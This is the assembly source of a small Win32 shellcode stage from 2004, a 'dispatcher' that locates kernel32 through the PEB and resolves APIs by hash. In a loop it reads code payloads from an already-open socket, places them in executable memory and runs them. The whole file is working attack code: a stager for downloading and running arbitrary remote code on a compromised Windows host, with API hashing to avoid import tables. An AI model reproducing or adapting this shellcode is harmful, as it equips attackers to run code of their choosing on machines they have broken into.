;
; Generic Win32 Dispatch Implementation (324 bytes)
;
; Approach:
;
;    1. Do standard symbol resolution & setup
;    2. Read in four bytes from the socket for the incoming payload length 
;       (recv)
;    3. Allocate a storage buffer for the payload  (VirtualAlloc)
;    4. Read the entire payload into the buffer (recv)
;    5. Call into the buffer, passing LoadLibraryA/GetProcAddress 
;    6. Deallocate the storage buffer (VirtualFree)
;    7. Loop to 2
;
; Bugs:
;
;    1. In the case of reading the payload length, recv could return less than
;       four bytes, in which case the length would not be completely read.
;       This can be fixed by adding chunked reads, or by asking Microsoft to
;       support MSG_WAITALL.
;
; Notes:
;
;    1. This expects the file descriptor in esi.
;
; skape
; mmiller@hick.org
; 04/2004
;

global _dispatcher_begin
global _dispatcher_end

section .text


%macro rsym 2
	push  %1                         ; Push symbol's hash
	push  edx                        ; Push library's base address (from edx)
	call  find_function              ; Resolve the absolute address
	mov   [ebp+%2], eax              ; Save in the given offset on the stack
%endmacro

_dispatcher_begin:
	jmp   short startup              ; Jump past the symbol resolution functions

;
; Standard symbol resolution functions (PEB for kernel32)
;
find_kernel32:
	push  esi                        ; Save esi
	xor   eax, eax
	mov   eax, [fs:eax+0x30]         ; Extract the PEB
	test  eax, eax                   ; Check for Windows 9x
	js    find_kernel32_9x           ; If signed short, jump to windows 9x lookup
find_kernel32_nt:
	mov   eax, [eax + 0x0c]          ; Extract the PROCESS_MODULE_INFO pointer from the PEB
	mov   esi, [eax + 0x1c]          ; Get the address of flink in the init module list
	lodsd                            ; Load the address of blink into eax
	mov   eax, [eax + 0x8]           ; Grab the module base address from the list entry
	jmp   short find_kernel32_fin    ; Fall down to the bottom
find_kernel32_9x:
	mov   eax, [eax + 0x34]          ; Undocumented offset (0x34)
	lea   eax, [eax + 0x7c]          ; Load the address of eax+0x7c to keep us in signed byte range
	mov   eax, [eax + 0x3c]          ; Undocumented offset (0xb8)
find_kernel32_fin:
	pop   esi                        ; Restore esi
	ret                              ; Return

find_function:
	pushad                           ; Save all registers
	mov   ebp, [esp + 0x24]          ; Store the base address in eax
	mov   eax, [ebp + 0x3c]          ; PE header VMA
	mov   edx, [ebp + eax + 0x78]    ; Export table relative offset
	add   edx, ebp                   ; Export table VMA
	mov   ecx, [edx + 0x18]          ; Number of names
	mov   ebx, [edx + 0x20]          ; Names table relative offset
	add   ebx, ebp                   ; Names table VMA
find_function_loop:
	jecxz find_function_finished     ; Jump to the end if ecx is 0
	dec   ecx                        ; Decrement our names counter
	mov   esi, [ebx + ecx * 4]       ; Store the relative offset of the name
	add   esi, ebp                   ; Set esi to the VMA of the current name 
compute_hash:
	xor   edi, edi                   ; Zero edi
	xor   eax, eax                   ; Zero eax
	cld                              ; Clear direction
compute_hash_again:
	lodsb                            ; Load the next byte from esi into al
	test  al, al                     ; Test ourselves.
	jz    compute_hash_finished      ; If the ZF is set, we've hit the null term.
	ror   edi, 0xd                   ; Rotate edi 13 bits to the right
	add   edi, eax                   ; Add the new byte to the accumulator
	jmp   compute_hash_again         ; Next iteration
compute_hash_finished:         
find_function_compare:           
	cmp   edi, [esp + 0x28]          ; Compare the computed hash with the requested hash
	jnz   find_function_loop         ; No match, try the next one.
	mov   ebx, [edx + 0x24]          ; Ordinals table relative offset
	add   ebx, ebp                   ; Ordinals table VMA
	mov   cx, [ebx + 2 * ecx]        ; Extrapolate the function's ordinal
	mov   ebx, [edx + 0x1c]          ; Address table relative offset
	add   ebx, ebp                   ; Address table VMA
	mov   eax, [ebx + 4 * ecx]       ; Extract the relative function offset from its ordinal
	add   eax, ebp                   ; Function VMA
	mov   [esp + 0x1c], eax          ; Overwrite stack version of eax from pushad
find_function_finished:
	popad                            ; Restore all registers
	ret                              ; Return

;
; ebp + 0x08 => LoadLibraryA
; ebp + 0x0c => GetProcAddress
; ebp + 0x10 => VirtualAlloc
; ebp + 0x14 => VirtualFree
; ebp + 0x18 => recv
;
startup:
	sub   esp, byte 0x1c             ; Allocate storage for symbol addresses
	mov   ebp, esp                   ; Use ebp as the storage point
	
resolve_kernel32_symbols:
	call  find_kernel32              ; Locate kernel32's base address
	mov   edx, eax                   ; Save it in edx

	rsym  0xec0e4e8e, 0x08           ; Resolve LoadLibraryA
	rsym  0x7c0dfcaa, 0x0c           ; Resolve GetProcAddress
	rsym  0x91afca54, 0x10           ; Resolve VirtualAlloc
	rsym  0x030633ac, 0x14           ; Resolve VirtualFree

resolve_winsock_symbols:
	xor   eax, eax                   ; Zero eax
	mov   ax, 0x3233                 ; Set low order bytes of eax to '32'
	push  eax                        ; Push '32\0\0'
	push  0x5f327377                 ; Push 'ws2_'
	mov   ebx, esp                   ; Set ebx to the pointer to 'ws2_32'
	push  ebx                        ; Push the pointer as the argument
	call  [ebp + 0x08]               ; Call LoadLibraryA()
	mov   edx, eax                   ; Save the base address in edx

	rsym  0xe71819b6, 0x18           ; Resolve recv

;
; The start of the dispatcher loop
;
dispatcher_loop:

read_payload_length:
	xor   eax, eax                   ; Zero eax
	push  eax                        ; Push 0 for flags
	mov   al, 0x04                   ; Set eax to 4
	push  eax                        ; Push 4 bytes as the length
	lea   eax, [ebp + 0x04]          ; Load the address of ebp + 4h
	push  eax                        ; Push it 
	push  esi                        ; Push the file descriptor
	call  [ebp + 0x18]               ; Call recv()
	test  eax, eax                   ; Check return status
	jc    dispatcher_loop_end        ; Jump to the end on carry bit set (failure)

allocate_storage:
	xor   eax, eax                   ; Zero eax
	inc   eax                        ; Increment eax to one
	shl   eax, 0x06                  ; Shift left 6 bits for PAGE_EXECUTE_READWRITE
	push  eax                        ; Push protection flags
	shl   eax, 0x06                  ; Shift left 6 more bits for MEM_COMMIT
	push  eax                        ; Push allocation flags
	mov   eax, [ebp + 0x04]          ; Store size in eax
	push  eax                        ; Push the size of the payload
	xor   eax, eax                   ; Zero eax
	push  eax                        ; Push NULL for the address
	call  [ebp + 0x10]               ; Call VirtualAlloc()
	test  eax, eax                   ; Check return status
	jz    dispatcher_loop_end        ; Jump to the end if we failed
	mov   edi, eax                   ; Save the buffer in edi

read_payload:
	xor   ebx, ebx                   ; Zero out the storage offset
read_payload_chunk:
	xor   eax, eax                   ; Zero eax
	push  eax                        ; Push 0 for flags
	mov   eax, [ebp + 0x04]          ; Set eax to the size of the payload
	sub   eax, ebx                   ; Subtract the current offset
	push  eax                        ; Push the number of bytes to read
	mov   eax, edi                   ; Set eax to the storage buffer
	add   eax, ebx                   ; Add the storage offset to it
	push  eax                        ; Push the offseted storage buffer
	push  esi                        ; Push the file descriptor
	call  [ebp + 0x18]               ; Call recv()
	test  eax, eax                   ; Check return status
	jc    dispatcher_loop_end        ; Jump to the end on carry bit set (failure)
	add   ebx, eax                   ; Update the storage offset
	cmp   ebx, [ebp + 0x04]          ; Compare the storage offset with the size of the payload
	jne   read_payload_chunk         ; Read the next portion of the payload if not equal

;
; Call the payload as:
;
;    void payload(int fd, void *pbuf, HMODULE (*LoadLibraryA)(LPCSTR),
;                 FARPROC (*GetProcAddress)(HMODULE, LPCSTR));
;
call_payload:
	mov   eax, [ebp + 0x0c]          ; Get GetProcAddress's address into eax
	push  eax                        ; Push GetProcAddress's address
	mov   eax, [ebp + 0x08]          ; Get LoadLibraryA's address into eax
	push  eax                        ; Push LoadLibraryA's address
	push  edi                        ; Push the buffer's absolute address
	push  esi                        ; Push the file descriptor
	call  edi                        ; Call into the payload
	pop   esi                        ; Pop esi back just in case it got jacked
	pop   edi                        ; Pop esi back just in case it got jacked
	pop   eax                        ; Don't care about LoadLibraryA
	pop   eax                        ; Don't care about GetProcAddress

deallocate_storage:
	xor   eax, eax                   ; Zero eax
	inc   eax                        ; Increment eax to 1
	shl   eax, 0x0e                  ; Shift left 14 bits 
	push  eax                        ; Push MEM_RELEASE for free type
	xor   eax, eax                   ; Zero eax
	push  eax                        ; Push zero for size
	push  edi                        ; Push the buffer
	call  [ebp + 0x14]               ; Call VirtualFree()

repeat_loop:
	jmp   dispatcher_loop            ; Loop back through

; Drop out
dispatcher_loop_end:

_dispatcher_end:
	ret
